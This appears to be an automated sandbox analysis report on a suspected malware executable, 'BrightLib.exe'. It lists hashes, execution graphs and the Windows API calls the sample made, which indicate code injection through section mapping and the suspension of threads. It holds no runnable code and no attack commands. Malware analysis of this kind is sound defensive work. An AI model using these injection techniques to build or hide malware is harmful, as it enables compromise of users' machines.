                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:12:54:21
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:846'325'235 bytes
                                                                                                                                                                                                                                                            MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:1.2%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:31.6%
                                                                                                                                                                                                                                                              Total number of Nodes:117
                                                                                                                                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                                                                                                                                              execution_graph 13801 221039b 13802 22103a9 13801->13802 13817 2210ceb 13802->13817 13804 2210934 13805 2210541 GetPEB 13807 22105be 13805->13807 13806 22104fc 13806->13804 13806->13805 13820 2210aab 13807->13820 13810 221061f CreateThread 13812 22105f7 13810->13812 13832 221095b GetPEB 13810->13832 13811 221082f 13814 221091f TerminateProcess 13811->13814 13812->13811 13828 2210fab GetPEB 13812->13828 13814->13804 13816 2210aab 4 API calls 13816->13811 13830 2210d0b GetPEB 13817->13830 13819 2210cf8 13819->13806 13821 2210ac1 CreateToolhelp32Snapshot 13820->13821 13823 22105f1 13821->13823 13824 2210af8 Thread32First 13821->13824 13823->13810 13823->13812 13824->13823 13825 2210b1f 13824->13825 13825->13823 13826 2210b56 Wow64SuspendThread 13825->13826 13827 2210b80 CloseHandle 13825->13827 13826->13827 13827->13825 13829 2210679 13828->13829 13829->13811 13829->13816 13831 2210d26 13830->13831 13831->13819 13835 22109b4 13832->13835 13833 2210a14 CreateThread 13833->13835 13836 221118b 13833->13836 13834 2210a61 13835->13833 13835->13834 13839 2263d50 13836->13839 13840 2263d75 13839->13840 13841 2263e5f 13839->13841 13875 22665d2 13840->13875 13851 226502b 13841->13851 13844 2263d8d 13845 22665d2 LoadLibraryA 13844->13845 13850 2211190 13844->13850 13846 2263dcf 13845->13846 13847 22665d2 LoadLibraryA 13846->13847 13848 2263deb 13847->13848 13849 22665d2 LoadLibraryA 13848->13849 13849->13850 13852 22665d2 LoadLibraryA 13851->13852 13853 226504e 13852->13853 13854 22665d2 LoadLibraryA 13853->13854 13855 2265066 13854->13855 13856 22665d2 LoadLibraryA 13855->13856 13857 2265084 13856->13857 13858 2265099 VirtualAlloc 13857->13858 13859 22650ad 13857->13859 13858->13859 13860 22650c7 13858->13860 13859->13850 13861 22665d2 LoadLibraryA 13860->13861 13873 2265320 13860->13873 13862 2265145 13861->13862 13862->13859 13866 226519b 13862->13866 13879 22663d9 13862->13879 13863 22665d2 LoadLibraryA 13863->13866 13865 22651fd 13865->13873 13874 226525f 13865->13874 13907 22641bb 13865->13907 13866->13863 13866->13865 13866->13873 13867 22653de VirtualFree 13867->13859 13869 2265248 13869->13873 13914 22642b6 13869->13914 13872 226537d 13872->13872 13873->13867 13873->13872 13874->13873 13883 226575b 13874->13883 13876 22665e9 13875->13876 13877 2266610 13876->13877 13933 22646d7 13876->13933 13877->13844 13882 22663ee 13879->13882 13880 2266464 LoadLibraryA 13881 226646e 13880->13881 13881->13862 13882->13880 13882->13881 13884 2265796 13883->13884 13885 22657dd NtCreateSection 13884->13885 13887 2265802 13884->13887 13906 2265e0a 13884->13906 13885->13887 13885->13906 13886 2265897 NtMapViewOfSection 13892 22658b7 13886->13892 13887->13886 13887->13906 13888 2265be0 VirtualAlloc 13896 2265c22 13888->13896 13889 22663d9 LoadLibraryA 13889->13892 13890 22663d9 LoadLibraryA 13891 2265b3e 13890->13891 13891->13888 13891->13890 13895 2265bdc 13891->13895 13919 2266477 13891->13919 13892->13889 13892->13891 13897 2266477 LoadLibraryA 13892->13897 13892->13906 13893 2265cd3 VirtualProtect 13894 2265d9e VirtualProtect 13893->13894 13902 2265cf3 13893->13902 13899 2265dcd 13894->13899 13895->13888 13896->13893 13904 2265cc0 NtMapViewOfSection 13896->13904 13896->13906 13897->13892 13898 2265f18 13900 2265f20 CreateThread 13898->13900 13898->13906 13899->13898 13899->13906 13923 226618c 13899->13923 13900->13906 13902->13894 13905 2265d78 VirtualProtect 13902->13905 13904->13893 13904->13906 13905->13902 13906->13873 13908 22663d9 LoadLibraryA 13907->13908 13909 22641cf 13908->13909 13910 2266477 LoadLibraryA 13909->13910 13913 22641d7 13909->13913 13911 22641ef 13910->13911 13912 2266477 LoadLibraryA 13911->13912 13911->13913 13912->13913 13913->13869 13915 22663d9 LoadLibraryA 13914->13915 13916 22642cc 13915->13916 13917 2266477 LoadLibraryA 13916->13917 13918 22642dc 13917->13918 13918->13874 13920 2266492 13919->13920 13922 22665a8 13919->13922 13920->13922 13927 226487c 13920->13927 13922->13891 13926 22661b4 13923->13926 13924 22663a6 13924->13898 13925 2266477 LoadLibraryA 13925->13926 13926->13924 13926->13925 13928 226489b 13927->13928 13930 22648c1 13927->13930 13928->13930 13931 2266477 LoadLibraryA 13928->13931 13932 22648ce 13928->13932 13929 22663d9 LoadLibraryA 13929->13932 13930->13929 13930->13932 13931->13928 13932->13922 13934 22646f7 13933->13934 13936 22647dc 13933->13936 13935 226487c LoadLibraryA 13934->13935 13934->13936 13935->13936 13936->13876

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 0226575B Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 022657F4
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 0226589C
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02265C10
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02265CC5
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02265CE2
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02265D85
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02265DB8
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02265F29
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1248616170-0
                                                                                                                                                                                                                                                              • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction ID: 3214f59d16e79302fb1fe37c10f657917a4d8f537e9da9ed1cdb2ef1d60afd6a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A542AB72618302AFD720CF94C888B7ABBE9FF88704F44492DF9859B245D774E894CB91
                                                                                                                                                                                                                                                              Function 02210AAB Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 187 2210aab-2210af2 CreateToolhelp32Snapshot 190 2210bc8-2210bcb 187->190 191 2210af8-2210b19 Thread32First 187->191 192 2210bb4-2210bc3 191->192 193 2210b1f-2210b25 191->193 192->190 194 2210b94-2210bae 193->194 195 2210b27-2210b2d 193->195 194->192 194->193 195->194 196 2210b2f-2210b4e 195->196 196->194 199 2210b50-2210b54 196->199 200 2210b56-2210b6a Wow64SuspendThread 199->200 201 2210b6c-2210b7b 199->201 202 2210b80-2210b92 CloseHandle 200->202 201->202 202->194
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,022105F1,?,00000001,?,81EC8B55,000000FF), ref: 02210AE9
                                                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02210B15
                                                                                                                                                                                                                                                              • Wow64SuspendThread.KERNEL32(00000000), ref: 02210B68
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02210B92
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849706056-0
                                                                                                                                                                                                                                                              • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction ID: bd859e4dc13824a2441dc620105ca8d3bc185e0758f5bfdd7b40512b9e77b98b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14410D71A00109AFDB18DF98C490FADB7F6EF88304F108168EA159B794DB74AE45CB94
                                                                                                                                                                                                                                                              Function 0221095B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 203 221095b-22109b2 GetPEB 204 22109bd-22109c1 203->204 205 2210a61-2210a68 204->205 206 22109c7-22109d2 204->206 207 2210a73-2210a77 205->207 208 22109d8-22109ef 206->208 209 2210a5c 206->209 211 2210a79-2210a86 207->211 212 2210a88-2210a8f 207->212 213 22109f1-2210a12 208->213 214 2210a14-2210a2c CreateThread 208->214 209->204 211->207 217 2210a91-2210a93 212->217 218 2210a98-2210a9d 212->218 215 2210a30-2210a38 213->215 214->215 215->209 220 2210a3a-2210a57 215->220 217->218 220->209
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02210A27
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                                                                              • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                                              • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction ID: c95bfc6bd8e76828e2e8cb9f965aa7ae606b1d8d912ef32ddb4bdf65d2874f9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4441C374A00209EFDB14CFD8C994BAEB7B1BF98314F208198D9156B384C775AE81CF94
                                                                                                                                                                                                                                                              Function 0221039B Relevance: 3.4, APIs: 2, Instructions: 399threadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 239 221039b-2210503 call 221094b call 2210f4b call 22110fb call 2210ceb 248 2210934-2210937 239->248 249 2210509-2210510 239->249 250 221051b-221051f 249->250 251 2210541-22105bc GetPEB 250->251 252 2210521-221053f call 2210e6b 250->252 253 22105c7-22105cb 251->253 252->250 255 22105e3-22105f5 call 2210aab 253->255 256 22105cd-22105e1 253->256 262 22105f7-221061d 255->262 263 221061f-2210640 CreateThread 255->263 256->253 264 2210643-2210647 262->264 263->264 266 2210908-2210932 TerminateProcess 264->266 267 221064d-2210680 call 2210fab 264->267 266->248 267->266 271 2210686-22106d5 267->271 273 22106e0-22106e6 271->273 274 22106e8-22106ee 273->274 275 221072e-2210732 273->275 278 2210701-2210705 274->278 279 22106f0-22106ff 274->279 276 2210800-22108f3 call 2210aab call 221094b call 2210f4b 275->276 277 2210738-2210745 275->277 305 22108f5 276->305 306 22108f8-2210902 276->306 280 2210750-2210756 277->280 281 2210707-2210715 278->281 282 221072c 278->282 279->278 286 2210786-2210789 280->286 287 2210758-2210766 280->287 281->282 283 2210717-2210729 281->283 282->273 283->282 291 221078c-2210793 286->291 289 2210784 287->289 290 2210768-2210777 287->290 289->280 290->289 293 2210779-2210782 290->293 291->276 295 2210795-221079e 291->295 293->286 295->276 297 22107a0-22107b0 295->297 299 22107bb-22107c7 297->299 300 22107c9-22107f6 299->300 301 22107f8-22107fe 299->301 300->299 301->291 305->306 306->266
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0221063E
                                                                                                                                                                                                                                                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02210932
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1197810419-0
                                                                                                                                                                                                                                                              • Opcode ID: 5394d61d30036053dc5097744bee352dfbcd8fe2a7001455bcd6049d3714d4c0
                                                                                                                                                                                                                                                              • Instruction ID: 19a9d8c9b8ef5b56a6356ffd210e0bcd1532f6aadfec08c1913dd9d5000cd94a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5394d61d30036053dc5097744bee352dfbcd8fe2a7001455bcd6049d3714d4c0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E12B2B5E10219DBDB14CF98C990BEDBBB2FF88304F2481A9D915AB385C7746A81CF54
                                                                                                                                                                                                                                                              Function 022663D9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 222 22663d9-22663ec 223 2266404-226640e 222->223 224 22663ee-22663f1 222->224 226 2266410-2266418 223->226 227 226641d-2266429 223->227 225 22663f3-22663f6 224->225 225->223 228 22663f8-2266402 225->228 226->227 229 226642c-2266431 227->229 228->223 228->225 230 2266464-226646b LoadLibraryA 229->230 231 2266433-226643e 229->231 234 226646e-2266472 230->234 232 2266440-2266458 call 2266aa7 231->232 233 226645a-226645e 231->233 232->233 238 2266473-2266475 232->238 233->229 236 2266460-2266462 233->236 236->230 236->234 238->234
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0226646B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                                                                                              • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction ID: 32960123885976747418965d04761789676c5b01bfe1f258294339a8d4120674
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A21E7776142968FDB21CFE8C888B797BACEF01264F18406DD815CBE49D778E885C780
                                                                                                                                                                                                                                                              Function 0226502B Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 307 226502b-226508f call 22665d2 * 3 314 2265091-2265093 307->314 315 22650b9 307->315 314->315 316 2265095-2265097 314->316 317 22650bc-22650c6 315->317 316->315 318 2265099-22650ab VirtualAlloc 316->318 319 22650c7-22650ea call 2266a47 call 2266a6b 318->319 320 22650ad-22650b4 318->320 326 2265134-226514d call 22665d2 319->326 327 22650ec-2265122 call 226673f call 2266615 319->327 320->315 321 22650b6 320->321 321->315 326->315 333 2265153 326->333 336 2265383-226538c 327->336 337 2265128-226512e 327->337 335 2265159-226515f 333->335 338 2265161-2265167 335->338 339 226519b-22651a4 335->339 342 2265393-226539b 336->342 343 226538e-2265391 336->343 337->326 337->336 344 2265169-226516c 338->344 340 22651a6-22651ac 339->340 341 22651fd-2265208 339->341 345 22651b0-22651cb call 22665d2 340->345 348 2265221-2265224 341->348 349 226520a-2265213 call 226431f 341->349 346 22653ca 342->346 347 226539d-22653c8 call 2266a6b 342->347 343->342 343->346 350 2265180-2265182 344->350 351 226516e-2265173 344->351 372 22651cd-22651d5 345->372 373 22651ea-22651fb 345->373 357 22653ce-22653ee call 2266a6b VirtualFree 346->357 347->357 353 226537f 348->353 354 226522a-2265233 348->354 349->353 368 2265219-226521f 349->368 350->339 352 2265184-2265192 call 22663d9 350->352 351->350 359 2265175-226517e 351->359 369 2265197-2265199 352->369 353->336 361 2265235 354->361 362 2265239-2265240 354->362 374 22653f4-22653f6 357->374 375 22653f0 357->375 359->344 359->350 361->362 370 2265242-226524b call 22641bb 362->370 371 2265270-2265274 362->371 368->362 369->335 386 226524d-2265253 370->386 387 2265259-2265262 call 22642b6 370->387 379 2265316-2265319 371->379 380 226527a-226529c 371->380 372->353 377 22651db-22651e4 372->377 373->341 373->345 374->317 375->374 377->353 377->373 382 226536b-226536d call 226575b 379->382 383 226531b-226531e 379->383 380->353 392 22652a2-22652b5 call 2266a47 380->392 391 2265372-2265373 382->391 383->382 388 2265320-2265323 383->388 386->353 386->387 387->371 404 2265264-226526a 387->404 389 2265325-2265327 388->389 390 226533c-226534d call 2264e1c 388->390 389->390 394 2265329-226532c 389->394 408 226535e-2265369 call 22648e8 390->408 409 226534f-226535b call 22653fb 390->409 395 2265374-226537b 391->395 406 22652b7-22652bb 392->406 407 22652d9-2265312 392->407 399 2265333-226533a call 2265fc9 394->399 400 226532e-2265331 394->400 395->353 401 226537d 395->401 399->391 400->395 400->399 401->401 404->353 404->371 406->407 411 22652bd-22652c0 406->411 407->353 419 2265314 407->419 408->391 409->408 411->379 414 22652c2-22652d7 call 226684a 411->414 414->419 419->379
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 022650A5
                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 022653E9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                              • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction ID: 68dde1fb438ea51bdfb3a2cbbf265db51690a6c47ba9a116cf8ce885a87937cb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60B1D473520B02EBDB219EE0CC88BB7B7A9FF05704F540519E9898A158E775E5F0CB91

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 02224EB8 Relevance: 119.5, Strings: 94, Instructions: 1985COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $ $"$%$&$($($+$,$,$-$.$/$/$0$2$3$3$6$7$:$:$;$=$=$>$@$@$@$A$A$B$C$C$D$D$D$D$E$F$G$H$I$J$K$L$M$N$O$O$O$Q$R$R$R$S$X$Z$\$\$^$^$_$_$`$`$b$c$d$e$f$f$g$h$h$j$l$m$n$n$o$s$x$x$x$y$y$y$y$z${$|$~$~
                                                                                                                                                                                                                                                              • API String ID: 0-4211698226
                                                                                                                                                                                                                                                              • Opcode ID: ea8e1a7f7199b132d6ae134b97f2fd2af05a518d80b17ba9b949ee7a452f80a1
                                                                                                                                                                                                                                                              • Instruction ID: 9d3b3d88112f20cb3cf89a71462d38d64ba24661c908015cf18d113a6fabdb4e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea8e1a7f7199b132d6ae134b97f2fd2af05a518d80b17ba9b949ee7a452f80a1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4203117152C3D09AD3349B78C4883AFBBD1AB96314F488A6DD4D98B3C6D7BA8449C743
                                                                                                                                                                                                                                                              Function 02236AC2 Relevance: 109.1, Strings: 87, Instructions: 370COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 906 2236ac2-2236cb8 907 2236cbd-2236ccb 906->907 907->907 908 2236ccd 907->908 909 2236ccf-2236cd2 908->909 910 2236d11-2236d4b 909->910 911 2236cd4-2236d0f 909->911 912 2236d50-2236d5e 910->912 911->909 912->912 913 2236d60 912->913 914 2236d62-2236d65 913->914 915 2236d67-2236db9 914->915 916 2236dbb-2236dfe 914->916 915->914 917 2236e03-2236e0e 916->917 917->917 918 2236e10 917->918 919 2236e12-2236e15 918->919 920 2236e17-2236e2c 919->920 921 2236e2e-223716a call 221ac88 * 5 919->921 920->919 932 223716f-223717d 921->932 932->932 933 223717f 932->933 934 2237181-2237184 933->934 935 22371a3-22371d4 934->935 936 2237186-22371a1 934->936 937 22371d9-22371e4 935->937 936->934 937->937 938 22371e6 937->938 939 22371e8-22371eb 938->939 940 2237204-2237258 call 221d128 939->940 941 22371ed-2237202 939->941 941->939
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $!$!$"$%$%$%$($($)$*$-$-$.$/$/$0$1$3$8$9$=$=$>$C$C$H$I$L$O$O$P$Q$S$S$T$T$U$W$X$Y$[$[$\$]$_$_$a$c$c$d$f$g$g$h$i$i$j$k$k$l$n$o$p$p$q$q$r$s$s$s$s$t$t$u$v$x$x$x$y$y$y$y$z${$|$~
                                                                                                                                                                                                                                                              • API String ID: 0-2695128964
                                                                                                                                                                                                                                                              • Opcode ID: f273c82de91a8441bc2826db2026364be7f25536e5fb336b93415c589d183631
                                                                                                                                                                                                                                                              • Instruction ID: c8f317a51538ef506a2873980c22291061c57a291639736d0770e581b8c05442
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f273c82de91a8441bc2826db2026364be7f25536e5fb336b93415c589d183631
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B32E120C0C7E9C9DB32867C9C487DDBFA11B23324F0846D9D5E96B3D2D2B50A85CB66
                                                                                                                                                                                                                                                              Function 02230E98 Relevance: 66.3, Strings: 52, Instructions: 1254COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $#$'$+$+$/$0$0$4$6$9$;$;$?$@$@$@$A$C$E$G$I$I$J$L$M$N$N$N$Q$U$U$V$W$Y$[$_$`$c$h$h$i$k$m$m$m$o$o$p$q$v$y
                                                                                                                                                                                                                                                              • API String ID: 0-4116487916
                                                                                                                                                                                                                                                              • Opcode ID: 1d807efea4efee64de0f504d757f6574232cfffc7188d4287b5b783fc905b4e0
                                                                                                                                                                                                                                                              • Instruction ID: 15acd4ea1de55d7f829f36c1718cc78199576dd08021ec03efda2dac1dae68b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d807efea4efee64de0f504d757f6574232cfffc7188d4287b5b783fc905b4e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09B28B7161C7C18BC3268A7C885439EBBD2ABD6324F094B6DE8E98B3D6D7748805C753
                                                                                                                                                                                                                                                              Function 0221B098 Relevance: 20.4, Strings: 16, Instructions: 422COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
